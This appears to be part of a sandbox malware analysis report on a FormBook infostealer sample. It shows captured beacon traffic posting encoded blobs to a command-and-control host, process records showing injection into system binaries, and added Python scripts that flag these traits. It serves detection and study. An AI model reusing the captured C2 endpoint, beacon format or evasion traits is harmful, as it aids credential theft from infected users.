                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 56 54 33 42 4e 68 4a 59 71 69 75 39 59 6c 6e 74 75 77 4b 41 44 59 53 55 47 38 42 4a 63 53 71 77 37 61 57 6c 59 54 57 49 37 64 71 4b 50 63 59 73 67 79 58 4b 71 69 6b 72 6a 44 50 75 64 4c 4d 71 63 6d 67 42 62 30 58 6f 45 6c 41 70 56 45 74 62 2b 4a 4f 70 64 75 42 30 6d 70 2f 52 31 68 53 57 7a 66 76 6d 78 44 41 75 71 52 32 35 43 2f 4e 46 53 51 74 35 39 6a 6e 30 74 30 41 4a 4b 6e 64 4f 39 79 62 6d 53 57 77 30 32 2b 31 48 36 39 56 31 62 2f 59 67 49 63 6f 71 31 45 36 68 57 41 36 58 39 47 68 73 6d 78 43 70 6a 68 4f 6a 31 6d 63 52 62 46 42 64 4e 4e 38 31 41 4c 65 55 4d 69 61 70 75 54 68 76 31 49 78 42 70 72 4d 61 38 6b 70 66 64 62 59 75 59 67 3d 3d
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDVT3BNhJYqiu9YlntuwKADYSUG8BJcSqw7aWlYTWI7dqKPcYsgyXKqikrjDPudLMqcmgBb0XoElApVEtb+JOpduB0mp/R1hSWzfvmxDAuqR25C/NFSQt59jn0t0AJKndO9ybmSWw02+1H69V1b/YgIcoq1E6hWA6X9GhsmxCpjhOj1mcRbFBdNN81ALeUMiapuThv1IxBprMa8kpfdbYuYg==
                                                            Jan 11, 2025 05:40:37.703903913 CET  533 bytes  IN
                                                            HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:37 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID: 7
                                                            Source IP: 192.168.2.6
                                                            Source Port: 53774
                                                            Destination IP: 209.74.79.40
                                                            Destination Port: 80
                                                            PID: 3880
                                                            Process: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jan 11, 2025 05:40:39.671791077 CET  1762 bytes  OUT
                                                            POST /bq63/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1248
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.shopphere.store
                                                            Referer: http://www.shopphere.store/bq63/
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Data Raw: 70 4c 4e 50 63 74 6e 3d 45 4f 69 30 48 30 68 4e 78 73 77 44 56 54 33 42 4e 68 4a 59 71 69 75 39 59 6c 6e 74 75 77 4b 41 44 59 53 55 47 38 42 4a 63 53 69 77 37 76 43 6c 59 79 57 49 36 64 71 4b 48 38 59 58 67 79 57 49 71 6a 4d 76 6a 44 53 62 64 49 30 71 61 30 6f 42 64 42 33 6f 52 31 41 70 64 6b 74 47 7a 70 50 6a 64 75 52 77 6d 70 76 52 31 68 53 57 7a 63 33 6d 78 53 41 75 73 52 32 36 46 2f 4e 7a 57 51 74 56 39 69 4f 50 74 30 55 5a 4b 58 39 4f 38 57 33 6d 56 6b 59 30 2b 2b 31 46 39 39 56 45 62 2f 55 46 49 63 6b 49 31 48 6d 66 57 41 4f 58 39 42 63 32 7a 77 75 58 78 48 43 69 69 78 67 55 55 44 39 53 45 37 74 4f 42 4b 65 41 4f 53 47 43 6a 7a 56 37 78 4f 38 74 72 36 49 49 67 68 6b 78 58 66 42 41 4d 36 62 2b 32 5a 32 59 46 61 52 4a 6e 54 54 30 72 71 2b 54 52 67 75 6f 41 6c 73 52 51 46 4c 67 73 77 71 65 75 6c 61 33 77 33 76 67 73 35 6d 4f 57 44 35 44 79 6c 67 4d 66 71 6f 68 4d 44 44 42 5a 6e 6b 30 56 46 48 76 4d 58 53 6a 39 30 51 44 33 37 75 42 33 50 38 79 74 71 44 50 51 43 35 52 2f 52 6e 56 34 46 54 46 45 74 [TRUNCATED]
                                                            Data Ascii: pLNPctn=EOi0H0hNxswDVT3BNhJYqiu9YlntuwKADYSUG8BJcSiw7vClYyWI6dqKH8YXgyWIqjMvjDSbdI0qa0oBdB3oR1ApdktGzpPjduRwmpvR1hSWzc3mxSAusR26F/NzWQtV9iOPt0UZKX9O8W3mVkY0++1F99VEb/UFIckI1HmfWAOX9Bc2zwuXxHCiixgUUD9SE7tOBKeAOSGCjzV7xO8tr6IIghkxXfBAM6b+2Z2YFaRJnTT0rq+TRguoAlsRQFLgswqeula3w3vgs5mOWD5DylgMfqohMDDBZnk0VFHvMXSj90QD37uB3P8ytqDPQC5R/RnV4FTFEtdI/eDy46/qWxOnVo0cP0ZbPaKR8jADy4bwUruvQoJpC6cGTN+0MW1lzGtLLnnVxAqacLWUcPNaDF2UPzyVasoio6yL5u2Ryf+sloY7ahKwi7vDJfmxwGcFYD7+krWk2h5pEbnaCLR3exNpo1TgA5bpWlDzoi6qV+iOkwDe4leO8ReP3zvd0dOjN4DfObjCnTsmx8hNfQ9F3RDAvyvGTtt0Go4aPesIjAB/rofHa0Xs4hdB7A6Vm9ZjDhI3rlgIPDjjfh4wt7/LmUCiUVqRjIW2K0sdXaOJoaPQFA2ToNc62AU7bz9LW2b1KMzeoLrZLub0B4amjVOQ/rJmjtzTrUD1HeEfP+KlhHL/4uJOs/XUTM8sqWyjqwZOkOy5JaCFIwXM+XMttgb5VLZTTw+gGPV56QoJOOt9cki/Nd6DpGerUeYgp2heuUBWlyuyxORTGNvnqE4BuJIHf5h4XMakXkK+wYCxtm0IaEZ3buXcosBG/wAXoQ4vgtD7g1x8sLV6xri1YDkeuGeS/mSxg0iEPvByFGOPqGRmpueG+qMNMxgtH32USBto1W5jNQzeDhbEGQpW3CjkbTLcYLLh4taEQIGatBSCVIT2hW1i955gYnG/p4wUC+2A7xLPBRx6Z7YwxwIimJ1qAMJstRVPTXEXXkLqC/KDAPtwuukM [TRUNCATED]
                                                            Jan 11, 2025 05:40:40.244244099 CET  533 bytes  IN
                                                            HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:40 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID: 8
                                                            Source IP: 192.168.2.6
                                                            Source Port: 53775
                                                            Destination IP: 209.74.79.40
                                                            Destination Port: 80
                                                            PID: 3880
                                                            Process: C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Timestamp  Bytes transferred  Direction  Data
                                                            Jan 11, 2025 05:40:42.379537106 CET  466 bytes  OUT
                                                            GET /bq63/?yL=ohjXjzZp0vl4&pLNPctn=JMKUEBcn+eAmAFujaEF1qxeVIjz6+zqaFMGoHelGSQfwy8OfYyWy6eToJbov20XPgBo7nj3xQKoGJ28WWnvYSwxzVh5Y8omsVuJaqqj7jyf3zIW+vgojp3i5Cusjdn8f20Ku4TQ= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US
                                                            Host: www.shopphere.store
                                                            Connection: close
                                                            User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)
                                                            Jan 11, 2025 05:40:42.944967031 CET  548 bytes  IN
                                                            HTTP/1.1 404 Not Found
                                                            Date: Sat, 11 Jan 2025 04:40:42 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
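
                                                            Sessions 7 and 8 above, together with the session that precedes them, show the same request shape each time: a short directory path (/bq63/), a single form field (pLNPctn) carrying an opaque base64 blob sent with '+', '/' and '=' unescaped, a Referer equal to the Origin plus the path, a User-Agent claiming Windows NT 5.1 on a handset, Connection: close, and a generic 404 from the server. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses the first POST and the GET transcribed from the capture (headers the heuristics never read are abbreviated), adds one constructed benign request for contrast, and scores each request against those traits. The trait names, the 64-character blob threshold and the flag threshold of three traits are this example's own assumptions, not FormBook signatures.

```python
"""Heuristic triage of captured HTTP requests for FormBook-style beacons.

Added example for this report, not Joe Sandbox tooling. Requests 1 and 2 are
transcribed from the capture above (unused headers abbreviated); request 3 is a
constructed benign request. Trait names and thresholds are assumptions.
"""
import re
from urllib.parse import urlsplit


def _req(*lines, body=""):
    return "\r\n".join(lines) + "\r\n\r\n" + body


UA_CAPTURED = "User-Agent: HTC_Touch_HD_T8282 Opera/9.50 (Windows NT 5.1; U; it)"

CAPTURED_REQUESTS = [
    _req("POST /bq63/ HTTP/1.1",                                # session before 7, first POST
         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
         "Accept-Language: en-US", "Accept-Encoding: gzip, deflate",
         "Host: www.shopphere.store", "Connection: close",
         "Content-Type: application/x-www-form-urlencoded", "Content-Length: 236",
         "Cache-Control: max-age=0", "Origin: http://www.shopphere.store",
         "Referer: http://www.shopphere.store/bq63/", UA_CAPTURED,
         body="pLNPctn=EOi0H0hNxswDVT3BNhJYqiu9YlntuwKADYSUG8BJcSqw7aWlYTWI7dqKPcYsgyXKqikrjDPudLMqcmg"
              "Bb0XoElApVEtb+JOpduB0mp/R1hSWzfvmxDAuqR25C/NFSQt59jn0t0AJKndO9ybmSWw02+1H69V1b/YgIcoq1E6h"
              "WA6X9GhsmxCpjhOj1mcRbFBdNN81ALeUMiapuThv1IxBprMa8kpfdbYuYg=="),
    _req("GET /bq63/?yL=ohjXjzZp0vl4&pLNPctn=JMKUEBcn+eAmAFujaEF1qxeVIjz6+zqaFMGoHelGSQfwy8OfYyWy6eToJbov"
         "20XPgBo7nj3xQKoGJ28WWnvYSwxzVh5Y8omsVuJaqqj7jyf3zIW+vgojp3i5Cusjdn8f20Ku4TQ= HTTP/1.1",  # session 8
         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
         "Accept-Language: en-US", "Host: www.shopphere.store", "Connection: close", UA_CAPTURED),
    _req("GET /index.html HTTP/1.1",                            # constructed benign request
         "Host: www.example.com",
         "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0",
         "Connection: keep-alive"),
]

B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")   # raw base64 alphabet, not percent-encoded
SHORT_DIR = re.compile(r"^/[a-z0-9]{2,8}/$")          # single short directory segment, e.g. /bq63/


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")          # first colon only: values hold "http://..."
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_params(s):
    """Split 'k=v&k2=v2' on '&' and the first '=' only, with NO '+' or percent decoding:
    the capture shows '+', '/' and '=' on the wire literally, and form-decoding would
    turn the '+' inside the blob into spaces and defeat the base64 check."""
    out = {}
    for part in s.split("&"):
        if part:
            k, _, v = part.partition("=")
            out[k] = v
    return out


def beacon_traits(method, target, headers, body):
    traits = []
    url = urlsplit(target)
    if SHORT_DIR.match(url.path):
        traits.append("short-dir-path")
    if "Windows NT 5.1" in headers.get("user-agent", ""):
        traits.append("legacy-xp-user-agent")
    origin, referer = headers.get("origin"), headers.get("referer")
    if origin and referer and referer == origin + url.path:
        traits.append("self-referer")
    payload = body if method == "POST" else url.query
    if any(B64_BLOB.match(v) for v in split_params(payload).values()):
        traits.append("base64-blob-parameter")
    if headers.get("connection", "").lower() == "close":
        traits.append("connection-close")
    return traits


def triage(raw_requests, threshold=3):
    """One record per request; flagged when at least `threshold` traits match.
    Each trait alone is common in benign traffic, hence the score rather than a match."""
    results = []
    for raw in raw_requests:
        method, target, headers, body = parse_request(raw)
        traits = beacon_traits(method, target, headers, body)
        results.append({"method": method, "host": headers.get("host", ""),
                        "path": urlsplit(target).path, "traits": traits,
                        "flagged": len(traits) >= threshold})
    return results


if __name__ == "__main__":
    for r in triage(CAPTURED_REQUESTS):
        print(("FLAG " if r["flagged"] else "ok   ") + r["method"], r["host"] + r["path"], r["traits"])
```

                                                            All three captured exchanges end in a 404, so the response side carries no signal here and the script scores the request side only. It does not try to decode the blob: nothing on this page describes its encoding beyond the base64 alphabet used on the wire.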



                                                            Target ID:0
                                                            Start time:23:38:43
                                                            Start date:10/01/2025
                                                            Path:C:\Users\user\Desktop\BLv4mI7zzY.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"
                                                            Imagebase:0x430000
                                                            File size:1'198'080 bytes
                                                            MD5 hash:B6A92EE2BA34B81FA9484072B4D20072
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:23:38:44
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"
                                                            Imagebase:0xc50000
                                                            File size:46'504 bytes
                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2644936328.0000000007FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2622644598.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2625771616.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:23:39:25
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe"
                                                            Imagebase:0x360000
                                                            File size:140'800 bytes
                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365143129.0000000002790000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3365692561.0000000002A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:23:39:27
                                                            Start date:10/01/2025
                                                            Path:C:\Windows\SysWOW64\RMActivate_ssp_isv.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"
                                                            Imagebase:0xac0000
                                                            File size:478'720 bytes
                                                            MD5 hash:E7516E154D7AEE0ECD4BF892C3BC33C2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3359125714.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3365172560.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3365128938.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:8
                                                            Start time:23:39:53
                                                            Start date:10/01/2025
                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                            Imagebase:0x7ff728280000
                                                            File size:676'768 bytes
                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true
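
                                                            The process list above carries three host-side indicators worth encoding as a check: Target 2 is svchost.exe whose command line names the sample itself; Targets 2 and 6 are binaries under C:\Windows with FormBook Yara hits in their memory; Target 5 is the dropped copy under a letters-only directory in Program Files (x86). The script below is an added example and is not part of the Joe Sandbox report: it parses the report's own Key:Value blocks (transcribed with only the fields it reads) and applies those three heuristics. The heuristic names and the twelve-letter threshold for a random-looking name are this example's assumptions.

```python
"""Triage of the per-process records above for signs of code injection.

Added example for this report, not Joe Sandbox tooling. The records are transcribed
from the Target ID blocks above with only the fields this script reads; the three
heuristics and their names are this example's own.
"""
import re

# Constructed from the process list above, in the report's own "Key:Value" line format.
PROCESS_RECORDS = r"""
Target ID:0
Path:C:\Users\user\Desktop\BLv4mI7zzY.exe
Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"

Target ID:2
Path:C:\Windows\SysWOW64\svchost.exe
Commandline:"C:\Users\user\Desktop\BLv4mI7zzY.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook

Target ID:5
Path:C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe
Commandline:"C:\Program Files (x86)\DMMWbaBGMkRweIsuCZNoZJStFdCPTPmlsNWRaPrtpgEXwFLtMkcZBMB\XNNdkVYUhBbatb.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook

Target ID:6
Path:C:\Windows\SysWOW64\RMActivate_ssp_isv.exe
Commandline:"C:\Windows\SysWOW64\RMActivate_ssp_isv.exe"
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook

Target ID:8
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
"""

RANDOM_NAME = re.compile(r"^[A-Za-z]{12,}$")   # long, letters-only name like the drop directory above


def parse_records(text):
    """Parse the report's "Key:Value" blocks into one dict per Target ID."""
    records, cur = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("• "):                       # one Yara match bullet
            cur.setdefault("yara", []).append(line[2:])
            continue
        key, _, value = line.partition(":")             # first colon only: values hold "C:\..."
        if key == "Target ID":
            cur = {"id": int(value)}
            records.append(cur)
        elif key == "Yara matches":
            cur.setdefault("yara", [])
        else:
            cur[key.lower()] = value
    return records


def image_from_cmdline(cmdline):
    """First token of a Windows command line, honouring a quoted image path."""
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(" ", 1)[0]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()            # NTFS is case-insensitive: firefox.exe == Firefox.exe


def injection_indicators(rec):
    hits = []
    path, cmd = rec["path"], rec["commandline"]
    # Image on disk differs from the image its own command line names: the footprint of a
    # hollowed or injected process (svchost.exe started "as" the sample above).
    if basename(path) != basename(image_from_cmdline(cmd)):
        hits.append("image-cmdline-mismatch")
    # Malware Yara hits inside the memory of a binary that ships under C:\Windows.
    if path.lower().startswith("c:\\windows\\") and rec.get("yara"):
        hits.append("yara-hit-in-system-binary")
    # Program Files (x86)\<letters>\<letters>.exe with no vendor-looking name anywhere.
    parts = path.split("\\")
    if (path.lower().startswith("c:\\program files (x86)\\") and len(parts) == 4
            and RANDOM_NAME.match(parts[2]) and RANDOM_NAME.match(parts[3].rsplit(".", 1)[0])):
        hits.append("random-named-program-files-drop")
    return hits


def triage_processes(text):
    return {rec["id"]: injection_indicators(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for target_id, hits in triage_processes(PROCESS_RECORDS).items():
        print(f"Target {target_id}: {hits or 'no indicators'}")
```

                                                            The image/command-line comparison is lower-cased on purpose: Target 8 is firefox.exe launched as Firefox.exe, which is the same file on NTFS and must not be reported. Note that Target 0 (the AutoIt-compiled dropper itself) shows no indicator under these rules; on a live host it is the parent of Target 2, and a parent/child view would add that link.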


                                                              Execution Graph

                                                              Execution Coverage:3.7%
                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                              Signature Coverage:6.4%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:69
                                                              execution_graph (rendered call-graph data; the node and edge listing is omitted here). Win32 API nodes named in the graph: PostQuitMessage, DefWindowProcW, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, LoadStringW, DestroyIcon, CharUpperBuffW, RtlAllocateHeap, DecodePointer, RaiseException, GetModuleHandleExW, GetProcAddress, ExitProcess, PeekMessageW, GetMessageW, TranslateMessage, DispatchMessageW, TranslateAcceleratorW, LockWindowUpdate, IsDialogMessageW, GetClassLongW, timeGetTime, QueryPerformanceCounter, QueryPerformanceFrequency, Sleep, WaitForSingleObject, GetExitCodeProcess, CloseHandle, VariantClear. Runtime-library nodes in the graph include _memset, _memmove, _wcscpy, __wsetenvp, __getptd_noexit, __NMSG_WRITE, ___crtCorExitProcess, std::exception::exception and a node labelled _W_store_winword.
101105->100911 101106->100921 101107->100924 101108->100964 101109->100964 101110->100964 101111->100964 101113 4384cb 101112->101113 101115 4384f2 101113->101115 102263 4389b3 69 API calls Mailbox 101113->102263 101115->100946 101116->100932 101117->100948 101118->100900 101119->100932 101120->100982 101121->100989 101123 43e6d5 101122->101123 101124 473aa9 101123->101124 101127 43e73f 101123->101127 101137 43e799 101123->101137 101125 439ea0 331 API calls 101124->101125 101126 473abe 101125->101126 101141 43e970 Mailbox 101126->101141 101220 499e4a 89 API calls 4 library calls 101126->101220 101130 437667 59 API calls 101127->101130 101127->101137 101128 437667 59 API calls 101128->101137 101131 473b04 101130->101131 101221 452d40 101131->101221 101132 452d40 __cinit 67 API calls 101132->101137 101133 43ea78 101133->101066 101135 473b26 101135->101066 101136 4384c0 69 API calls 101136->101141 101137->101128 101137->101132 101137->101135 101138 43e95a 101137->101138 101137->101141 101138->101141 101224 499e4a 89 API calls 4 library calls 101138->101224 101140 439ea0 331 API calls 101140->101141 101141->101133 101141->101136 101141->101140 101142 43f195 101141->101142 101145 499e4a 89 API calls 101141->101145 101147 438d40 59 API calls 101141->101147 101219 437f77 59 API calls 2 library calls 101141->101219 101225 486e8f 59 